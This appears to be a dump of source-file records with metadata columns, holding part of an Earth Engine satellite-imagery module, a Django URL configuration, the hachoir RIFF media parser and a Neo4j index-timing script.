rescale(img, 'img.B8 + img.B11 + img.B12', [0.3, 0.8]))
ndsi = img.normalizedDifference(['B3', 'B11'])
return score.min(rescale(ndsi, 'img', [0.8, 0.6]))
def cloudScoreS2(img):
rescale = img.divide(10000)
score = cloudScore(rescale).multiply(100).rename('cloudscore')
return img.addBands(score)
sentinel2 = ee.ImageCollection('COPERNICUS/S2')
f2017s2 = sentinel2.filterDate(startDate, endDate).filterMetadata(
'CLOUDY_PIXEL_PERCENTAGE', 'less_than', metadataCloudCoverMax)
m2017s2 = f2017s2.map(cloudScoreS2)
m2017s3 = m2017s2.median()
return imageToMapId(m2017s3, visParams)
def filteredSentinelSARComposite(visParams, startDate, endDate):
def toNatural(img):
return ee.Image(10).pow(img.divide(10))
def addRatioBands(img):
# not using angle band
vv = img.select('VV')
vh = img.select('VH')
vv_vh = vv.divide(vh).rename('VV/VH')
vh_vv = vh.divide(vv).rename('VH/VV')
return vv.addBands(vh).addBands(vv_vh).addBands(vh_vv)
sentinel1 = ee.ImageCollection('COPERNICUS/S1_GRD')
sentinel1 = sentinel1.filterDate(startDate, endDate) \
.filter(ee.Filter.listContains('transmitterReceiverPolarisation', 'VV')) \
.filter(ee.Filter.listContains('transmitterReceiverPolarisation', 'VH')) \
.filter(ee.Filter.eq('instrumentMode', 'IW'))
sentinel1 = sentinel1.map(toNatural)
sentinel1 = sentinel1.map(addRatioBands)
median = sentinel1.median()
return imageToMapId(median, visParams)
########## Time Series ##########
def getTimeSeriesByCollectionAndIndex(assetId, indexName, scale, coords, startDate, endDate, reducer):
geometry = None
indexCollection = None
if isinstance(coords[0], list):
geometry = ee.Geometry.Polygon(coords)
else:
geometry = ee.Geometry.Point(coords)
if indexName != None:
indexCollection = ee.ImageCollection(assetId).filterDate(
startDate, endDate).select(indexName)
else:
indexCollection = ee.ImageCollection(
assetId).filterDate(startDate, endDate)
def getIndex(image):
theReducer = getReducer(reducer)
if indexName != None:
indexValue = image.reduceRegion(
theReducer, geometry, scale).get(indexName)
else:
indexValue = image.reduceRegion(theReducer, geometry, scale)
date = image.get('system:time_start')
indexImage = ee.Image().set(
'indexValue', [ee.Number(date), indexValue])
return indexImage
def getClipped(image):
return image.clip(geometry)
clippedcollection = indexCollection.map(getClipped)
indexCollection1 = clippedcollection.map(getIndex)
indexCollection2 = indexCollection1.aggregate_array('indexValue')
return indexCollection2.getInfo()
def getTimeSeriesByIndex(indexName, scale, coords, startDate, endDate, reducer):
bandsByCollection = {
'LANDSAT/LC08/C01/T1_TOA': ['B2', 'B3', 'B4', 'B5', 'B6', 'B7'],
'LANDSAT/LC08/C01/T2_TOA': ['B2', 'B3', 'B4', 'B5', 'B6', 'B7'],
'LANDSAT/LE07/C01/T1_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7'],
'LANDSAT/LE07/C01/T2_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7'],
'LANDSAT/LT05/C01/T1_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7'],
'LANDSAT/LT05/C01/T2_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7'],
'LANDSAT/LT04/C01/T1_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7'],
'LANDSAT/LT04/C01/T2_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7']
}
indexes = {
'NDVI': '(nir - red) / (nir + red)',
'EVI': '2.5 * (nir - red) / (nir + 6.0 * red - 7.5 * blue + 1)',
'EVI2': '2.5 * (nir - red) / (nir + 2.4 * red + 1)',
'NDMI': '(nir - swir1) / (nir + swir1)',
'NDWI': '(green - nir) / (green + nir)',
'NBR': '(nir - swir2) / (nir + swir2)',
'LSAVI': '((nir - red) / (nir + red + 0.5)) * (1 + 0.5)'
}
def create(name):
def maskClouds(image):
def isSet(types):
""" https://landsat.usgs.gov/collectionqualityband """
typeByValue = {
'badPixels': 15,
'cloud': 16,
'shadow': 256,
'snow': 1024,
'cirrus': 4096
}
anySet = ee.Image(0)
for Type in types:
anySet = anySet.Or(image.select(
'BQA').bitwiseAnd(typeByValue[Type]).neq(0))
return anySet
return image.updateMask(isSet(['badPixels', 'cloud', 'shadow', 'cirrus']).Not())
def toIndex(image):
bands = bandsByCollection[name]
return image.expression(indexes[indexName], {
'blue': image.select(bands[0]),
'green': image.select(bands[1]),
'red': image.select(bands[2]),
'nir': image.select(bands[3]),
'swir1': image.select(bands[4]),
'swir2': image.select(bands[5]),
}).clamp(-1, 1).rename(['index'])
def toIndexWithTimeStart(image):
time = image.get('system:time_start')
image = maskClouds(image)
return toIndex(image).set('system:time_start', time)
#
if startDate and endDate:
return ee.ImageCollection(name).filterDate(startDate, endDate).filterBounds(geometry).map(toIndexWithTimeStart, True)
else:
return ee.ImageCollection(name).filterBounds(geometry).map(toIndexWithTimeStart, True)
def reduceRegion(image):
theReducer = getReducer(reducer)
reduced = image.reduceRegion(
theReducer, geometry=geometry, scale=scale, maxPixels=1e6)
return ee.Feature(None, {
'index': reduced.get('index'),
'timeIndex': [image.get('system:time_start'), reduced.get('index')]
})
geometry = None
if isinstance(coords[0], list) or isinstance(coords[0], tuple):
geometry = ee.Geometry.Polygon(coords)
else:
geometry = ee.Geometry.Point(coords)
collection = ee.ImageCollection([])
for name in bandsByCollection:
collection = collection.merge(create(name))
return ee.ImageCollection(ee.ImageCollection(collection).sort('system:time_start').distinct('system:time_start')) \
.map(reduceRegion) \
.filterMetadata('index', 'not_equals', None) \
.aggregate_array('timeIndex') \
.getInfo()
########## Degradation##########
def getDegradationTileUrlByDateS1(geometry, date, visParams):
imDate = datetime.datetime.strptime(date, "%Y-%m-%d")
befDate = imDate - datetime.timedelta(days=1)
aftDate = imDate + datetime.timedelta(days=1)
if isinstance(geometry[0], list):
geometry = ee.Geometry.Polygon(geometry)
else:
geometry = ee.Geometry.Point(geometry)
sentinel1Data = getS1({
"targetBands": ['VV', 'VH', 'VV/VH'],
'region': geometry})
start = befDate.strftime('%Y-%m-%d')
end = aftDate.strftime('%Y-%m-%d')
selectedImage = sentinel1Data.filterDate(start, end).first()
selectedImage = ee.Image(selectedImage)
mapparams = selectedImage.getMapId(visParams)
return mapparams['tile_fetcher'].url_format
def getDegradationPlotsByPointS1(geometry, start, end):
if isinstance(geometry[0], list):
geometry = ee.Geometry.Polygon(geometry)
else:
geometry = ee.Geometry.Point(geometry)
sentinel1Data = getS1({
"targetBands": ['VV', 'VH', 'VV/VH'],
'region': geometry
}).filterDate(start, end)
def myimageMapper(img):
theReducer = ee.Reducer.mean()
indexValue = img.reduceRegion(theReducer, geometry, 30)
date = img.get('system:time_start')
visParams = {'bands': ['VV', 'VH', 'ratioVVVH'],
'min': [-15, -25, .40], 'max': [0, -10, 1], 'gamma': 1.6}
indexImage = ee.Image().set(
'indexValue', [ee.Number(date), indexValue])
return indexImage
lsd = sentinel1Data.map(myimageMapper, True)
indexCollection2 = lsd.aggregate_array('indexValue')
values = indexCollection2.getInfo()
return values
def getDegradationTileUrlByDate(geometry, date, visParams):
imDate = datetime.datetime.strptime(date, "%Y-%m-%d")
startDate = imDate - datetime.timedelta(days=1)
endDate = imDate + datetime.timedelta(days=1)
if isinstance(geometry[0], list):
geometry = ee.Geometry.Polygon(geometry)
else:
geometry = ee.Geometry.Point(geometry)
landsatData = getLandsat({
"start": startDate.strftime('%Y-%m-%d'),
"end": endDate.strftime('%Y-%m-%d'),
"targetBands": ['RED', 'GREEN', 'BLUE', 'SWIR1', 'NIR'],
"region": geometry,
"sensors": {"l4": False, "l5": False, "l7": False, "l8": True}
})
selectedImage = landsatData.first()
unmasked = ee.Image(selectedImage).multiply(10000).toInt16().unmask()
mapparams = unmasked.getMapId(visParams)
return mapparams['tile_fetcher'].url_format
def getDegradationPlotsByPoint(geometry, start, end, band):
if isinstance(geometry[0], list):
geometry = ee.Geometry.Polygon(geometry)
else:
geometry = ee.Geometry.Point(geometry)
landsatData = getLandsat({
"start": start,
"end": end,
"targetBands": [band],
"region": geometry,
"sensors": {"l4": True, "l5": True, "l7": True, "l8": True}
})
def myImageMapper(img):
theReducer = ee.Reducer.mean()
indexValue = img.reduceRegion(theReducer, geometry, 30)
date = img.get('system:time_start')
indexImage = ee.Image().set(
'indexValue',
[ee.Number(date), indexValue]
)
return indexImage
lsd = landsatData.map(myImageMapper, True)
indexCollection2 = lsd.aggregate_array('indexValue')
values = indexCollection2.getInfo()
return values
########## Stats ##########
def getStatistics(extent):
extentGeom = ee.Geometry.Polygon(extent)
elev = ee.Image('USGS/GTOPO30')
minmaxElev = elev.reduceRegion(
ee.Reducer.minMax(), extentGeom, 1000, maxPixels=500000000)
minElev = minmaxElev.get('elevation_min').getInfo()
maxElev = minmaxElev.get('elevation_max').getInfo()
ciesinPopGrid = ee.Image('CIESIN/GPWv4/population-count/2020')
popDict = ciesinPopGrid.reduceRegion(
ee.Reducer.sum(), extentGeom, maxPixels=500000000)
pop = popDict.get('population-count').getInfo()
pop = int(pop)
return {
'minElev': minElev,
'maxElev': maxElev,
'pop': pop
}
| 38.704268
| 130
| 0.605593
| 2,617
| 25,390
| 5.838365
| 0.185327
| 0.032463
| 0.021598
| 0.014137
| 0.387394
| 0.317691
| 0.278814
| 0.252634
| 0.236861
| 0.213496
| 0
| 0.038154
| 0.24746
| 25,390
| 655
| 131
| 38.763359
| 0.761501
| 0.035841
| 0
| 0.294231
| 0
| 0.059615
| 0.12065
| 0.026416
| 0
| 0
| 0
| 0.001527
| 0
| 1
| 0.094231
| false
| 0.003846
| 0.015385
| 0.015385
| 0.244231
| 0.001923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e8cedec4a5704ab1636f88d9b806e93b86ff8a
| 1,186
|
py
|
Python
|
userManagement/management/urls.py
|
shubhamguptaorg/user_managementl
|
ad98e0e4886d9b0547b05ae424c10d8f6268d470
|
[
"MIT"
] | null | null | null |
userManagement/management/urls.py
|
shubhamguptaorg/user_managementl
|
ad98e0e4886d9b0547b05ae424c10d8f6268d470
|
[
"MIT"
] | 4
|
2021-03-19T03:22:44.000Z
|
2022-03-11T23:58:10.000Z
|
userManagement/management/urls.py
|
shubhamguptaorg/user_managementl
|
ad98e0e4886d9b0547b05ae424c10d8f6268d470
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.urls import path,include
from django.views.generic import TemplateView
from .views import Index,SignUp,UserDashboard,AdminDashboard,logout,showAdminData,deleteuser,activeUser,deactiveUser,UserDetailEdit,uploadImage
# from .views import Index,UserDashboard,SignUp,AdminDashboard
app_name='management'
urlpatterns = [
# path('',homepage,name="index"),
path('',Index.as_view(), name='index'),
path('signup',SignUp.as_view(),name="signup"),
path('userdashboard',UserDashboard.as_view(),name="userDashboard"),
path('admindashboard',AdminDashboard.as_view(),name="adminDashboard"),
path('admindashboard/showuserdata/',showAdminData.as_view(),name='showAdminData'),
path('admindashboard/showuserdata/deleteuser/<userId>',deleteuser,name='deleteuser'),
path('admindashboard/showuserdata/activeUser/<userId>', activeUser, name='activeUser'),
path('admindashboard/showuserdata/deactiveUser/<userId>', deactiveUser, name='deactiveUser'),
path('uploadimage/',uploadImage,name="uploadImage"),
path('editUserDetail/',UserDetailEdit.as_view(),name='userEditDetail'),
path('logout',logout,name='logout')
]
| 49.416667
| 143
| 0.764755
| 122
| 1,186
| 7.377049
| 0.270492
| 0.04
| 0.066667
| 0.044444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080101
| 1,186
| 23
| 144
| 51.565217
| 0.824931
| 0.077572
| 0
| 0
| 0
| 0
| 0.331193
| 0.156881
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e96b9312873b5f396a18010caddd4d11bd8888
| 16,962
|
py
|
Python
|
sickbeard/lib/hachoir_parser/container/riff.py
|
Branlala/docker-sickbeardfr
|
3ac85092dc4cc8a4171fb3c83e9682162245e13e
|
[
"MIT"
] | null | null | null |
sickbeard/lib/hachoir_parser/container/riff.py
|
Branlala/docker-sickbeardfr
|
3ac85092dc4cc8a4171fb3c83e9682162245e13e
|
[
"MIT"
] | null | null | null |
sickbeard/lib/hachoir_parser/container/riff.py
|
Branlala/docker-sickbeardfr
|
3ac85092dc4cc8a4171fb3c83e9682162245e13e
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
"""
RIFF parser, able to parse:
* AVI video container
* WAV audio container
* CDA file
Documents:
- libavformat source code from ffmpeg library
http://ffmpeg.mplayerhq.hu/
- Video for Windows Programmer's Guide
http://www.opennet.ru/docs/formats/avi.txt
- What is an animated cursor?
http://www.gdgsoft.com/anituner/help/aniformat.htm
Authors:
* Aurélien Jacobs
* Mickaël KENIKSSI
* Victor Stinner
Changelog:
* 2007-03-30: support ACON (animated icons)
* 2006-08-08: merge AVI, WAV and CDA parsers into RIFF parser
* 2006-08-03: creation of CDA parser by Mickaël KENIKSSI
* 2005-06-21: creation of WAV parser by Victor Stinner
* 2005-06-08: creation of AVI parser by Victor Stinner and Aurélien Jacobs
Thanks to:
* Wojtek Kaniewski (wojtekka AT logonet.com.pl) for its CDA file
format information
"""
from lib.hachoir_parser import Parser
from lib.hachoir_core.field import (FieldSet, ParserError,
UInt8, UInt16, UInt32, Enum,
Bit, NullBits, NullBytes,
RawBytes, String, PaddingBytes,
SubFile)
from lib.hachoir_core.tools import alignValue, humanDuration
from lib.hachoir_core.endian import LITTLE_ENDIAN
from lib.hachoir_core.text_handler import filesizeHandler, textHandler
from lib.hachoir_parser.video.fourcc import audio_codec_name, video_fourcc_name
from lib.hachoir_parser.image.ico import IcoFile
from datetime import timedelta
def parseText(self):
yield String(self, "text", self["size"].value,
strip=" \0", truncate="\0",
charset="ISO-8859-1")
def parseRawFormat(self, size):
yield RawBytes(self, "raw_format", size)
def parseVideoFormat(self, size):
yield UInt32(self, "video_size", "Video format: Size")
yield UInt32(self, "width", "Video format: Width")
yield UInt32(self, "height", "Video format: Height")
yield UInt16(self, "panes", "Video format: Panes")
yield UInt16(self, "depth", "Video format: Depth")
yield UInt32(self, "tag1", "Video format: Tag1")
yield UInt32(self, "img_size", "Video format: Image size")
yield UInt32(self, "xpels_meter", "Video format: XPelsPerMeter")
yield UInt32(self, "ypels_meter", "Video format: YPelsPerMeter")
yield UInt32(self, "clr_used", "Video format: ClrUsed")
yield UInt32(self, "clr_important", "Video format: ClrImportant")
def parseAudioFormat(self, size):
yield Enum(UInt16(self, "codec", "Audio format: Codec id"), audio_codec_name)
yield UInt16(self, "channel", "Audio format: Channels")
yield UInt32(self, "sample_rate", "Audio format: Sample rate")
yield UInt32(self, "bit_rate", "Audio format: Bit rate")
yield UInt16(self, "block_align", "Audio format: Block align")
if size >= 16:
yield UInt16(self, "bits_per_sample", "Audio format: Bits per sample")
if size >= 18:
yield UInt16(self, "ext_size", "Audio format: Size of extra information")
if size >= 28: # and self["a_channel"].value > 2
yield UInt16(self, "reserved", "Audio format: ")
yield UInt32(self, "channel_mask", "Audio format: channels placement bitmask")
yield UInt32(self, "subformat", "Audio format: Subformat id")
def parseAVIStreamFormat(self):
size = self["size"].value
strtype = self["../stream_hdr/stream_type"].value
TYPE_HANDLER = {
"vids": (parseVideoFormat, 40),
"auds": (parseAudioFormat, 16)
}
handler = parseRawFormat
if strtype in TYPE_HANDLER:
info = TYPE_HANDLER[strtype]
if info[1] <= size:
handler = info[0]
for field in handler(self, size):
yield field
def parseAVIStreamHeader(self):
if self["size"].value != 56:
raise ParserError("Invalid stream header size")
yield String(self, "stream_type", 4, "Stream type four character code", charset="ASCII")
field = String(self, "fourcc", 4, "Stream four character code", strip=" \0", charset="ASCII")
if self["stream_type"].value == "vids":
yield Enum(field, video_fourcc_name, lambda text: text.upper())
else:
yield field
yield UInt32(self, "flags", "Stream flags")
yield UInt16(self, "priority", "Stream priority")
yield String(self, "language", 2, "Stream language", charset="ASCII", strip="\0")
yield UInt32(self, "init_frames", "InitialFrames")
yield UInt32(self, "scale", "Time scale")
yield UInt32(self, "rate", "Divide by scale to give frame rate")
yield UInt32(self, "start", "Stream start time (unit: rate/scale)")
yield UInt32(self, "length", "Stream length (unit: rate/scale)")
yield UInt32(self, "buf_size", "Suggested buffer size")
yield UInt32(self, "quality", "Stream quality")
yield UInt32(self, "sample_size", "Size of samples")
yield UInt16(self, "left", "Destination rectangle (left)")
yield UInt16(self, "top", "Destination rectangle (top)")
yield UInt16(self, "right", "Destination rectangle (right)")
yield UInt16(self, "bottom", "Destination rectangle (bottom)")
class RedBook(FieldSet):
"""
RedBook offset parser, used in CD audio (.cda) file
"""
def createFields(self):
yield UInt8(self, "frame")
yield UInt8(self, "second")
yield UInt8(self, "minute")
yield PaddingBytes(self, "notused", 1)
def formatSerialNumber(field):
"""
Format an disc serial number.
Eg. 0x00085C48 => "0008-5C48"
"""
sn = field.value
return "%04X-%04X" % (sn >> 16, sn & 0xFFFF)
def parseCDDA(self):
"""
HSG address format: number of 1/75 second
HSG offset = (minute*60 + second)*75 + frame + 150 (from RB offset)
HSG length = (minute*60 + second)*75 + frame (from RB length)
"""
yield UInt16(self, "cda_version", "CD file version (currently 1)")
yield UInt16(self, "track_no", "Number of track")
yield textHandler(UInt32(self, "disc_serial", "Disc serial number"),
formatSerialNumber)
yield UInt32(self, "hsg_offset", "Track offset (HSG format)")
yield UInt32(self, "hsg_length", "Track length (HSG format)")
yield RedBook(self, "rb_offset", "Track offset (Red-book format)")
yield RedBook(self, "rb_length", "Track length (Red-book format)")
def parseWAVFormat(self):
size = self["size"].value
if size not in (16, 18):
self.warning("Format with size of %s bytes is not supported!" % size)
yield Enum(UInt16(self, "codec", "Audio codec"), audio_codec_name)
yield UInt16(self, "nb_channel", "Number of audio channel")
yield UInt32(self, "sample_per_sec", "Sample per second")
yield UInt32(self, "byte_per_sec", "Average byte per second")
yield UInt16(self, "block_align", "Block align")
yield UInt16(self, "bit_per_sample", "Bits per sample")
def parseWAVFact(self):
yield UInt32(self, "nb_sample", "Number of samples in audio stream")
def parseAviHeader(self):
yield UInt32(self, "microsec_per_frame", "Microsecond per frame")
yield UInt32(self, "max_byte_per_sec", "Maximum byte per second")
yield NullBytes(self, "reserved", 4)
# Flags
yield NullBits(self, "reserved[]", 4)
yield Bit(self, "has_index")
yield Bit(self, "must_use_index")
yield NullBits(self, "reserved[]", 2)
yield Bit(self, "is_interleaved")
yield NullBits(self, "reserved[]", 2)
yield Bit(self, "trust_cktype")
yield NullBits(self, "reserved[]", 4)
yield Bit(self, "was_capture_file")
yield Bit(self, "is_copyrighted")
yield NullBits(self, "reserved[]", 14)
yield UInt32(self, "total_frame", "Total number of frames in the video")
yield UInt32(self, "init_frame", "Initial frame (used in interleaved video)")
yield UInt32(self, "nb_stream", "Number of streams")
yield UInt32(self, "sug_buf_size", "Suggested buffer size")
yield UInt32(self, "width", "Width in pixel")
yield UInt32(self, "height", "Height in pixel")
yield UInt32(self, "scale")
yield UInt32(self, "rate")
yield UInt32(self, "start")
yield UInt32(self, "length")
def parseODML(self):
yield UInt32(self, "total_frame", "Real number of frame of OpenDML video")
padding = self["size"].value - 4
if 0 < padding:
yield NullBytes(self, "padding[]", padding)
class AVIIndexEntry(FieldSet):
size = 16*8
def createFields(self):
yield String(self, "tag", 4, "Tag", charset="ASCII")
yield UInt32(self, "flags")
yield UInt32(self, "start", "Offset from start of movie data")
yield UInt32(self, "length")
def parseIndex(self):
while not self.eof:
yield AVIIndexEntry(self, "index[]")
class Chunk(FieldSet):
TAG_INFO = {
# This dictionnary is edited by RiffFile.validate()
"LIST": ("list[]", None, "Sub-field list"),
"JUNK": ("junk[]", None, "Junk (padding)"),
# Metadata
"INAM": ("title", parseText, "Document title"),
"IART": ("artist", parseText, "Artist"),
"ICMT": ("comment", parseText, "Comment"),
"ICOP": ("copyright", parseText, "Copyright"),
"IENG": ("author", parseText, "Author"),
"ICRD": ("creation_date", parseText, "Creation date"),
"ISFT": ("producer", parseText, "Producer"),
"IDIT": ("datetime", parseText, "Date time"),
# TODO: Todo: see below
# "strn": Stream description
# TWOCC code, movie/field[]/tag.value[2:4]:
# "db": "Uncompressed video frame",
# "dc": "Compressed video frame",
# "wb": "Audio data",
# "pc": "Palette change"
}
subtag_info = {
"INFO": ("info", "File informations"),
"hdrl": ("headers", "Headers"),
"strl": ("stream[]", "Stream header list"),
"movi": ("movie", "Movie stream"),
"odml": ("odml", "ODML"),
}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
self._size = (8 + alignValue(self["size"].value, 2)) * 8
tag = self["tag"].value
if tag in self.TAG_INFO:
self.tag_info = self.TAG_INFO[tag]
if tag == "LIST":
subtag = self["subtag"].value
if subtag in self.subtag_info:
info = self.subtag_info[subtag]
self.tag_info = (info[0], None, info[1])
self._name = self.tag_info[0]
self._description = self.tag_info[2]
else:
self.tag_info = ("field[]", None, None)
def createFields(self):
yield String(self, "tag", 4, "Tag", charset="ASCII")
yield filesizeHandler(UInt32(self, "size", "Size"))
if not self["size"].value:
return
if self["tag"].value == "LIST":
yield String(self, "subtag", 4, "Sub-tag", charset="ASCII")
handler = self.tag_info[1]
while 8 < (self.size - self.current_size)/8:
field = self.__class__(self, "field[]")
yield field
if (field.size/8) % 2 != 0:
yield UInt8(self, "padding[]", "Padding")
else:
handler = self.tag_info[1]
if handler:
for field in handler(self):
yield field
else:
yield RawBytes(self, "raw_content", self["size"].value)
padding = self.seekBit(self._size)
if padding:
yield padding
def createDescription(self):
tag = self["tag"].display
return u"Chunk (tag %s)" % tag
class ChunkAVI(Chunk):
TAG_INFO = Chunk.TAG_INFO.copy()
TAG_INFO.update({
"strh": ("stream_hdr", parseAVIStreamHeader, "Stream header"),
"strf": ("stream_fmt", parseAVIStreamFormat, "Stream format"),
"avih": ("avi_hdr", parseAviHeader, "AVI header"),
"idx1": ("index", parseIndex, "Stream index"),
"dmlh": ("odml_hdr", parseODML, "ODML header"),
})
class ChunkCDDA(Chunk):
TAG_INFO = Chunk.TAG_INFO.copy()
TAG_INFO.update({
'fmt ': ("cdda", parseCDDA, "CD audio informations"),
})
class ChunkWAVE(Chunk):
TAG_INFO = Chunk.TAG_INFO.copy()
TAG_INFO.update({
'fmt ': ("format", parseWAVFormat, "Audio format"),
'fact': ("nb_sample", parseWAVFact, "Number of samples"),
'data': ("audio_data", None, "Audio stream data"),
})
def parseAnimationHeader(self):
yield UInt32(self, "hdr_size", "Size of header (36 bytes)")
if self["hdr_size"].value != 36:
self.warning("Animation header with unknown size (%s)" % self["size"].value)
yield UInt32(self, "nb_frame", "Number of unique Icons in this cursor")
yield UInt32(self, "nb_step", "Number of Blits before the animation cycles")
yield UInt32(self, "cx")
yield UInt32(self, "cy")
yield UInt32(self, "bit_count")
yield UInt32(self, "planes")
yield UInt32(self, "jiffie_rate", "Default Jiffies (1/60th of a second) if rate chunk not present")
yield Bit(self, "is_icon")
yield NullBits(self, "padding", 31)
def parseAnimationSequence(self):
while not self.eof:
yield UInt32(self, "icon[]")
def formatJiffie(field):
sec = float(field.value) / 60
return humanDuration(timedelta(seconds=sec))
def parseAnimationRate(self):
while not self.eof:
yield textHandler(UInt32(self, "rate[]"), formatJiffie)
def parseIcon(self):
yield SubFile(self, "icon_file", self["size"].value, parser_class=IcoFile)
class ChunkACON(Chunk):
TAG_INFO = Chunk.TAG_INFO.copy()
TAG_INFO.update({
'anih': ("anim_hdr", parseAnimationHeader, "Animation header"),
'seq ': ("anim_seq", parseAnimationSequence, "Animation sequence"),
'rate': ("anim_rate", parseAnimationRate, "Animation sequence"),
'icon': ("icon[]", parseIcon, "Icon"),
})
class RiffFile(Parser):
PARSER_TAGS = {
"id": "riff",
"category": "container",
"file_ext": ("avi", "cda", "wav", "ani"),
"min_size": 16*8,
"mime": (u"video/x-msvideo", u"audio/x-wav", u"audio/x-cda"),
# FIXME: Use regex "RIFF.{4}(WAVE|CDDA|AVI )"
"magic": (
("AVI LIST", 8*8),
("WAVEfmt ", 8*8),
("CDDAfmt ", 8*8),
("ACONanih", 8*8),
),
"description": "Microsoft RIFF container"
}
VALID_TYPES = {
"WAVE": (ChunkWAVE, u"audio/x-wav", u"Microsoft WAVE audio", ".wav"),
"CDDA": (ChunkCDDA, u"audio/x-cda", u"Microsoft Windows audio CD file (cda)", ".cda"),
"AVI ": (ChunkAVI, u"video/x-msvideo", u"Microsoft AVI video", ".avi"),
"ACON": (ChunkACON, u"image/x-ani", u"Microsoft Windows animated cursor", ".ani"),
}
endian = LITTLE_ENDIAN
def validate(self):
if self.stream.readBytes(0, 4) != "RIFF":
return "Wrong signature"
if self["type"].value not in self.VALID_TYPES:
return "Unknown RIFF content type"
return True
def createFields(self):
yield String(self, "signature", 4, "AVI header (RIFF)", charset="ASCII")
yield filesizeHandler(UInt32(self, "filesize", "File size"))
yield String(self, "type", 4, "Content type (\"AVI \", \"WAVE\", ...)", charset="ASCII")
# Choose chunk type depending on file type
try:
chunk_cls = self.VALID_TYPES[self["type"].value][0]
except KeyError:
chunk_cls = Chunk
# Parse all chunks up to filesize
while self.current_size < self["filesize"].value*8+8:
yield chunk_cls(self, "chunk[]")
if not self.eof:
yield RawBytes(self, "padding[]", (self.size-self.current_size)/8)
def createMimeType(self):
try:
return self.VALID_TYPES[self["type"].value][1]
except KeyError:
return None
def createDescription(self):
tag = self["type"].value
if tag == "AVI ":
desc = u"Microsoft AVI video"
if "headers/avi_hdr" in self:
header = self["headers/avi_hdr"]
desc += ": %ux%u pixels" % (header["width"].value, header["height"].value)
microsec = header["microsec_per_frame"].value
if microsec:
desc += ", %.1f fps" % (1000000.0 / microsec)
if "total_frame" in header and header["total_frame"].value:
delta = timedelta(seconds=float(header["total_frame"].value) * microsec)
desc += ", " + humanDuration(delta)
return desc
else:
try:
return self.VALID_TYPES[tag][2]
except KeyError:
return u"Microsoft RIFF container"
def createContentSize(self):
size = (self["filesize"].value + 8) * 8
return min(size, self.stream.size)
def createFilenameSuffix(self):
try:
return self.VALID_TYPES[self["type"].value][3]
except KeyError:
return ".riff"
| 38.55
| 103
| 0.614432
| 2,069
| 16,962
| 4.958434
| 0.212663
| 0.054586
| 0.076031
| 0.00926
| 0.172336
| 0.107905
| 0.064919
| 0.058485
| 0.035676
| 0.027878
| 0
| 0.027067
| 0.242012
| 16,962
| 439
| 104
| 38.637813
| 0.770864
| 0.092619
| 0
| 0.147929
| 0
| 0
| 0.274117
| 0.001633
| 0
| 0
| 0.000392
| 0.002278
| 0
| 1
| 0.085799
| false
| 0
| 0.026627
| 0
| 0.210059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5eb56662663b212c6709a52f8fbe61a75880b3c
| 800
|
py
|
Python
|
tools/ldbc_benchmark/neo4j/load_scripts/time_index.py
|
carlboudreau007/ecosys
|
d415143837a85ceb6213a0f0588128a86a4a3984
|
[
"Apache-2.0"
] | 245
|
2018-04-07T00:14:56.000Z
|
2022-03-28T05:51:35.000Z
|
tools/ldbc_benchmark/neo4j/load_scripts/time_index.py
|
carlboudreau007/ecosys
|
d415143837a85ceb6213a0f0588128a86a4a3984
|
[
"Apache-2.0"
] | 47
|
2018-04-02T16:41:22.000Z
|
2022-03-24T01:40:46.000Z
|
tools/ldbc_benchmark/neo4j/load_scripts/time_index.py
|
carlboudreau007/ecosys
|
d415143837a85ceb6213a0f0588128a86a4a3984
|
[
"Apache-2.0"
] | 140
|
2018-08-09T15:54:47.000Z
|
2022-03-30T12:44:48.000Z
|
from datetime import datetime
with open('/home/neo4j/neo4j-community-3.5.1/logs/debug.log', 'r') as log:
begin = []
end = []
for line in log:
if 'Index population started' in line:
begin.append(line[:23])
elif 'Index creation finished' in line:
end.append(line[:23])
if len(begin) == 0 or len(begin) > 9:
print("Something went wrong. Please check debug.log")
elif len(begin) != len(end):
print("{}/{} Done. Please come back later.".format(len(end), len(begin)))
else:
elapsed_time = 0
for i in range(0,9):
begin_tmp = datetime.strptime(begin[i], '%Y-%m-%d %H:%M:%S.%f')
end_tmp = datetime.strptime(end[i],'%Y-%m-%d %H:%M:%S.%f')
elapsed_time += (end_tmp-begin_tmp).total_seconds()
print("Done in {} s".format(elapsed_time))
| 34.782609
| 77
| 0.6175
| 128
| 800
| 3.796875
| 0.46875
| 0.065844
| 0.049383
| 0.016461
| 0.032922
| 0.032922
| 0.032922
| 0.032922
| 0
| 0
| 0
| 0.021807
| 0.1975
| 800
| 22
| 78
| 36.363636
| 0.735202
| 0
| 0
| 0
| 0
| 0
| 0.28375
| 0.06
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0.15
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
